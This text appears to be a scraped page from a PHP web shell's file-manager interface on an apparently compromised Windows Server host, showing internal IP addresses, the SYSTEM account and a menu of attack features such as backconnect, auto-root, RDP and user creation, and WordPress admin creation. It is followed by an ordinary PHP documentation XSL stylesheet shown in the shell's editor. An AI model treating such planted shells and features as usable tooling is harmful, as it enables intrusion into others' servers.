Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
php /
pear /
PHP /
UML /
Output /
Html /
[ HOME SHELL ]
Name
Size
Permission
Action
resources
[ DIR ]
drwxrwxrwx
Exporter.php
864
B
-rw-rw-rw-
allclasses-frame.xsl
1.58
KB
-rw-rw-rw-
classifier.xsl
16.89
KB
-rw-rw-rw-
documentation-common.xsl
8.15
KB
-rw-rw-rw-
documentation-generator.xsl
8.28
KB
-rw-rw-rw-
index-all.xsl
5.79
KB
-rw-rw-rw-
index.xsl
1.71
KB
-rw-rw-rw-
main.xsl
689
B
-rw-rw-rw-
overview-frame.xsl
1.38
KB
-rw-rw-rw-
overview-summary.xsl
4.94
KB
-rw-rw-rw-
package-frame.xsl
2.73
KB
-rw-rw-rw-
package-summary.xsl
5.73
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : documentation-common.xsl
<?xml version="1.0" encoding="iso-8859-1"?> <xsl:stylesheet version="1.0" exclude-result-prefixes="uml xmi exslt exslt-set exslt-functions" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:uml="http://schema.omg.org/spec/UML/2.1.2" xmlns:xmi="http://schema.omg.org/spec/XMI/2.1" xmlns:exslt="http://exslt.org/common" xmlns:exslt-set="http://exslt.org/sets" xmlns:exslt-functions="http://exslt.org/functions"> <!-- Common templates required by the documentation exporter --> <!-- Returns the generalized elements of the current context (through <element> tags)--> <xsl:template name="generalization"> <xsl:variable name="parent" select="key('getElementById', @general)"/> <element> <xsl:attribute name="href"> <xsl:call-template name="getPackageFilePath"> <xsl:with-param name="context" select="$parent"/> </xsl:call-template> <xsl:call-template name="getPrefix"> <xsl:with-param name="context" select="$parent"/> </xsl:call-template> <xsl:value-of select="concat($parent/@name,'.html')"/> </xsl:attribute> <xsl:attribute name="id"> <xsl:value-of select="$parent/@xmi:id"/> </xsl:attribute> <xsl:call-template name="getPackageNamePart"> <xsl:with-param name="context" select="$parent"/> </xsl:call-template> <xsl:value-of select="$parent/@name"/> </element> <xsl:for-each select="$parent/generalization"> <xsl:call-template name="generalization"/> </xsl:for-each> </xsl:template> <xsl:template name="htmlHead"> <xsl:param name="path"/> <xsl:param name="title"/> <xsl:comment><xsl:value-of select="concat('Generated by ',$appName,' on ',$genDate)"/></xsl:comment> <head> <title><xsl:value-of select="$title"/></title> <link rel="stylesheet" type="text/css" media="all" href="{concat($path,'style.css')}" /> </head> </xsl:template> <xsl:template name="htmlInherit"> <xsl:param name="relPathTop" /> <img src="{concat($relPathTop, 'inherit.gif')}" alt="extended by "/> </xsl:template> <!-- Displays the inheritance-tree of the current class --> <xsl:template name="htmlInheritedClassTree"> <xsl:param name="path"/> <xsl:param name="relPathTop" /> <xsl:variable name="nbElement" select="count(exslt:node-set($path)/*)"/> <xsl:if test="$nbElement > 1"> <!-- no display if the class does not inherit from anything --> <dl class="classTree"> <xsl:for-each select="exslt:node-set($path)/*"> <xsl:sort select="position()" data-type="number" order="descending"/> <dd> <xsl:choose> <xsl:when test="position() > 1"> <xsl:if test="position() = last()"> <xsl:attribute name="class">currentElem</xsl:attribute> </xsl:if> <xsl:attribute name="style"><xsl:value-of select="concat('padding-left:',(position()-1)*30,'px')"/></xsl:attribute> <xsl:call-template name="htmlInherit"> <xsl:with-param name="relPathTop" select="$relPathTop"/> </xsl:call-template> </xsl:when> </xsl:choose> <xsl:choose> <xsl:when test="position() < $nbElement"> <a href="{concat($relPathTop, @href)}"><xsl:value-of select="text()"/></a> </xsl:when> <xsl:otherwise> <xsl:value-of select="text()"/> </xsl:otherwise> </xsl:choose> </dd> </xsl:for-each> </dl> </xsl:if> </xsl:template> <xsl:template name="htmlStartPage"> <xsl:attribute name="xmlns">http://www.w3.org/1999/xhtml</xsl:attribute> <xsl:attribute name="xml:lang">en</xsl:attribute> <xsl:attribute name="lang">en</xsl:attribute> </xsl:template> <xsl:template name="htmlTableSummary"> <xsl:param name="relPathTop"/> <xsl:param name="set" /> <xsl:param name="filePrefix" /> <table border="1" class="tableSummary"> <xsl:for-each select="$set"> <tr> <td><strong><a href="{concat($filePrefix, @name, '.html')}"><xsl:value-of select="@name"/></a></strong></td> <td><xsl:call-template name="titleComment"/></td> </tr> </xsl:for-each> </table> </xsl:template> <!-- Displays the parameters of a function as a bracketed list (<ownedParameter...) --> <xsl:template name="htmlParametersBracket"> <xsl:param name="relPathTop" /> <xsl:text>(</xsl:text> <xsl:for-each select="ownedParameter[@direction!='return' or not(@direction)]"> <xsl:call-template name="htmlType"> <xsl:with-param name="relPathTop" select="$relPathTop"/> <xsl:with-param name="context" select="."/> </xsl:call-template> <xsl:if test="@direction='inout'">&</xsl:if> <xsl:value-of select="@name" /> <xsl:if test="defaultValue"> <xsl:value-of select="concat('=', defaultValue/@value)"/> </xsl:if> <xsl:if test="position() < last()"> <xsl:text>, </xsl:text> </xsl:if> </xsl:for-each> <xsl:text>)</xsl:text> </xsl:template> <!-- Displays a type as a hyperlink (<type xmi:idref="..."/>) --> <xsl:template name="htmlType"> <xsl:param name="relPathTop" /> <xsl:param name="context" /> <xsl:variable name="idref" select="$context/type/@xmi:idref | $context/@type"/> <xsl:if test="$idref!=''"> <xsl:variable name="typeElement" select="key('getElementById', $idref)"/> <xsl:call-template name="htmlLinkToElement"> <xsl:with-param name="relPathTop" select="$relPathTop"/> <xsl:with-param name="context" select="$typeElement"/> </xsl:call-template> <xsl:text> </xsl:text> </xsl:if> </xsl:template> <!-- Displays the description/docblocks about a given element --> <xsl:template name="htmlDescription"> <xsl:param name="baseElement"/> <xsl:variable name="docblocks" select="key('getMetadata', $baseElement)/*[local-name()!='param' and local-name()!='return' and local-name()!='access' and local-name()!='var']"/> <xsl:for-each select="ownedComment"> <xsl:value-of select="@body"/> <xsl:call-template name="br-replace"> <xsl:with-param name="str" select="body/text()"/> </xsl:call-template> <div> <xsl:for-each select="$docblocks"> <xsl:call-template name="htmlDocblock"/> </xsl:for-each> </div> </xsl:for-each> </xsl:template> <!-- Displays the description/params. Used for method parameters detailing --> <xsl:template name="htmlDescriptionParam"> <xsl:param name="baseElement"/> <xsl:variable name="docblocks" select="key('getMetadata', $baseElement)/*[local-name()='param' or local-name()='return']"/> <xsl:for-each select="ownedComment"> <p> <xsl:value-of select="@body"/> <xsl:call-template name="br-replace"> <xsl:with-param name="str" select="body/text()"/> </xsl:call-template> </p> </xsl:for-each> </xsl:template> <!-- Displays a docblock element (in general) --> <xsl:template name="htmlDocblock"> <b> <xsl:call-template name="toUpperCase"> <xsl:with-param name="str" select="substring(local-name(),1,1)"/> </xsl:call-template> <xsl:value-of select="concat(substring(local-name(),2), ': ')"/></b> <xsl:value-of select="text()"/> <xsl:copy-of select="*"/><br/> </xsl:template> <!-- Displays a docblock param --> <xsl:template name="htmlDocblockParam"> <xsl:value-of select="substring-after(substring-after(text(), ' '), ' ')"/> <xsl:copy-of select="*"/> </xsl:template> <!-- Replace breaklines by <br/> --> <xsl:template name="br-replace"> <xsl:param name="str"/> <xsl:choose> <xsl:when test="contains($str,$cr)"> <xsl:value-of select="substring-before($str,$cr)"/> <br/> <xsl:call-template name="br-replace"> <xsl:with-param name="str" select="substring-after($str,$cr)"/> </xsl:call-template> </xsl:when> <xsl:otherwise> <xsl:value-of select="$str"/> </xsl:otherwise> </xsl:choose> </xsl:template> <xsl:template name="htmlLinkToElement"> <xsl:param name="relPathTop" /> <xsl:param name="context" /> <xsl:param name="style" select="string('linkType')"/> <xsl:variable name="path"> <xsl:call-template name="getPackageFilePath"> <xsl:with-param name="context" select="$context"/> </xsl:call-template> <xsl:call-template name="getPrefix"> <xsl:with-param name="context" select="$context"/> </xsl:call-template> </xsl:variable> <a href="{concat($relPathTop,$path,$context/@name,'.html')}" class="{$style}"><xsl:value-of select="$context/@name"/></a> </xsl:template> </xsl:stylesheet>
Close